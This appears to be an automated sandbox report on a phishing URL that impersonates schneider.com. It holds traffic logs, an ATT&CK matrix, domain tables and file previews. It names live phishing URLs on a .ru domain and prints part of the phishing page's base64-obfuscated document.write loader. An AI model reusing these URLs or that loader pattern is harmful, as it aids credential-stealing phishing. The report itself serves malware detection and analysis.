Source: unknownHTTP traffic detected: POST /report/v4?s=tDyR3UugMIPZBBdjiZCp27D1MB6wJKntsvCtd2gloxygBtZ4%2B8QiNnqm%2FR9vPa3NxIPu7Val3YvXJ2%2FrNgARTV%2FShN65%2FiVllE8TUoFKf2iEhLSkTu3PKjUmwTHF6Q%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 432Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 23:28:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDyR3UugMIPZBBdjiZCp27D1MB6wJKntsvCtd2gloxygBtZ4%2B8QiNnqm%2FR9vPa3NxIPu7Val3YvXJ2%2FrNgARTV%2FShN65%2FiVllE8TUoFKf2iEhLSkTu3PKjUmwTHF6Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5368&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2290&delivery_rate=521420&cwnd=219&unsent_bytes=0&cid=7f7179ead2d3831f&ts=167&x=0"CF-Cache-Status: HITAge: 6104Server: cloudflareCF-RAY: 8e856a5f0f9542db-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1774&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1898&delivery_rate=1609702&cwnd=231&unsent_bytes=0&cid=2f9893acc95bcefb&ts=474&x=0"
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: classification engineClassification label: mal52.win@19/14@24/10
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1824,i,5043773792219058669,17741932396626826224,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1824,i,5043773792219058669,17741932396626826224,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://8a6b7.qvzjymmm.ru/favicon.ico100%Avira URL Cloudphishing
https://8a6b7.qvzjymmm.ru/O3YCEI/100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    code.jquery.com
    151.101.2.137
    truefalse
      high
      schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt
      94.46.180.190
      truetrue
        unknown
        8a6b7.qvzjymmm.ru
        172.67.211.54
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              high
              www.google.com
              172.217.21.36
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://a.nel.cloudflare.com/report/v4?s=tDyR3UugMIPZBBdjiZCp27D1MB6wJKntsvCtd2gloxygBtZ4%2B8QiNnqm%2FR9vPa3NxIPu7Val3YvXJ2%2FrNgARTV%2FShN65%2FiVllE8TUoFKf2iEhLSkTu3PKjUmwTHF6Q%3D%3Dfalse
                  high
                  http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/false
                    unknown
                    https://challenges.cloudflare.com/turnstile/v0/g/e4025c85ea63/api.jsfalse
                      high
                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                        high
                        https://8a6b7.qvzjymmm.ru/favicon.icofalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/e00u8/0x4AAAAAAA0rtdv_xNXYa5Om/auto/fbE/normal/auto/false
                          high
                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                            high
                            https://8a6b7.qvzjymmm.ru/O3YCEI/#Bfalse
                              unknown
                              https://8a6b7.qvzjymmm.ru/O3YCEI/false
                              • Avira URL Cloud: phishing
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e856a3e49b28c06&lang=autofalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  172.67.211.54
                                  8a6b7.qvzjymmm.ruUnited States
                                  13335CLOUDFLARENETUSfalse
                                  104.17.24.14
                                  cdnjs.cloudflare.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  104.18.94.41
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  104.18.95.41
                                  challenges.cloudflare.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  94.46.180.190
                                  schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.ptPortugal
                                  24768ALMOUROLTECPTtrue
                                  151.101.2.137
                                  code.jquery.comUnited States
                                  54113FASTLYUSfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  172.217.21.36
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  35.190.80.1
                                  a.nel.cloudflare.comUnited States
                                  15169GOOGLEUSfalse
                                  IP
                                  192.168.2.4
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1562764
                                  Start date and time:2024-11-26 00:27:16 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 2m 53s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:browseurl.jbs
                                  Sample URL:http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:7
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal52.win@19/14@24/10
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.46, 64.233.165.84, 34.104.35.123, 199.232.210.172, 192.229.221.95, 172.217.17.35
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/
                                  No simulations
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                  Category:dropped
                                  Size (bytes):48316
                                  Entropy (8bit):5.6346993394709
                                  Encrypted:false
                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                  MD5:2CA03AD87885AB983541092B87ADB299
                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                  Malicious:false
                                  Reputation:low
                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65447)
                                  Category:dropped
                                  Size (bytes):89501
                                  Entropy (8bit):5.289893677458563
                                  Encrypted:false
                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                  Malicious:false
                                  Reputation:low
                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                  Category:downloaded
                                  Size (bytes):61
                                  Entropy (8bit):3.990210155325004
                                  Encrypted:false
                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text, with very long lines (7321), with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):19578
                                  Entropy (8bit):5.881707523036335
                                  Encrypted:false
                                  SSDEEP:384:Unuq3G5ZFs04yFfDVvQnuq3G5ZFs04yFfDVvilr8lrlG6:sG5ZFs0RwG5ZFs0Rqlr8lr86
                                  MD5:AB2DE67743E827BD1A9FE06A89ACDD6D
                                  SHA1:86826A1C2E6B19699F9D75981F5D0B76D7B25A7D
                                  SHA-256:461CBEB50998560C6AD1CC7B0F5A2ABCCD15FAC3F6B50C041EAC4260F8C35863
                                  SHA-512:5B081560704ABECF6DAA201DDE3357FBA2AFF64D2BB360A12E3154F65A3A7A60891B51737F49ACDB9BD6FF1F9470ADD927917D5730C4E3C54C6A028EB1C8FBF5
                                  Malicious:false
                                  Reputation:low
                                  URL:https://8a6b7.qvzjymmm.ru/O3YCEI/
                                  Preview: Try not to become a man of success. Rather become a man of value. -->.. Success usually comes to those who are too busy to be looking for it. -->..<script>....if(atob("aHR0cHM6Ly84YTZiNy5xdnpqeW1tbS5ydS9PM1lDRUkv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvd
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65447)
                                  Category:downloaded
                                  Size (bytes):89501
                                  Entropy (8bit):5.289893677458563
                                  Encrypted:false
                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
